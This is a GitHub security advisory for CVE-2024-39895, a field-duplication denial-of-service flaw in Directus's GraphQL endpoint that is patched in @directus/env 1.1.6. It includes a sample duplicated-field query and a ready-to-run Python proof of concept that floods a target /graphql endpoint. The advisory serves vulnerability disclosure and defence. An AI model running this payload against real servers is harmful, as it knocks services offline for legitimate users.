Skip to content

Directus GraphQL Field Duplication Denial of Service (DoS)

Moderate severity GitHub Reviewed Published Jul 8, 2024 in directus/directus • Updated Aug 7, 2024

Package

npm @directus/env (npm)

Affected versions

< 1.1.6

Patched versions

1.1.6

Description

Summary

A denial of service (DoS) attack by field duplication in GraphQL is a type of attack where an attacker exploits the flexibility of GraphQL to overwhelm a server by requesting the same field multiple times in a single query. This can cause the server to perform redundant computations and consume excessive resources, leading to a denial of service for legitimate users.

Details

Request to the endpoint /graphql are sent when visualizing graphs generated at a dashboard:
image

DoS5

By modifying the data sent and duplicating many times the fields a DoS attack is possible.

PoC

The goal is to create a payload that generates a body like this, where the 'max' field is duplicated many times, each with the 'id' field duplicated many times inside it.
{'query': 'query { query_4f4722ea: test_table_aggregated { max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } } }'}

Although that payload seems harmless, a bigger one leaves the service unresponsive.

The following code might serve as a PoC written in Python3:

# GitHub @asantof

import requests

## CHANGE THIS VALUES: url, auth_token, query_name, collection_name
url = 'http://0.0.0.0:8055/graphql'
auth_token = '' 
query_name = 'query_XXXXX' 
collection_name = ''  

headers = {
    'Content-Type': 'application/json',
    'Authorization': f'Bearer {auth_token}',
}

id_payload = 'id ' * 200
max_payload = 'max {' + id_payload + ' } '
full_payload = max_payload * 200

data = {
    'query': 'query { ' + query_name + ': ' + collection_name + '_aggregated { ' + full_payload + ' } }'
}

print(data)

response = requests.post(url, headers=headers, json=data)

print(response.json())

DoS4

After running it the service will be unresponsive for a while:
DoS

Impact

The vulnerability impacts the service's availability by causing it to become unresponsive for a few minutes. An attacker could continuously send this request to the server, rendering the service unavailable indefinitely.

References

@br41nslug br41nslug published to directus/directus Jul 8, 2024
Published by the National Vulnerability Database Jul 8, 2024
Published to the GitHub Advisory Database Jul 8, 2024
Reviewed Jul 8, 2024
Last updated Aug 7, 2024

Severity

Moderate

EPSS score

0.043%
(10th percentile)

Weaknesses

CVE ID

CVE-2024-39895

GHSA ID

GHSA-7hmh-pfrp-vcx4

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.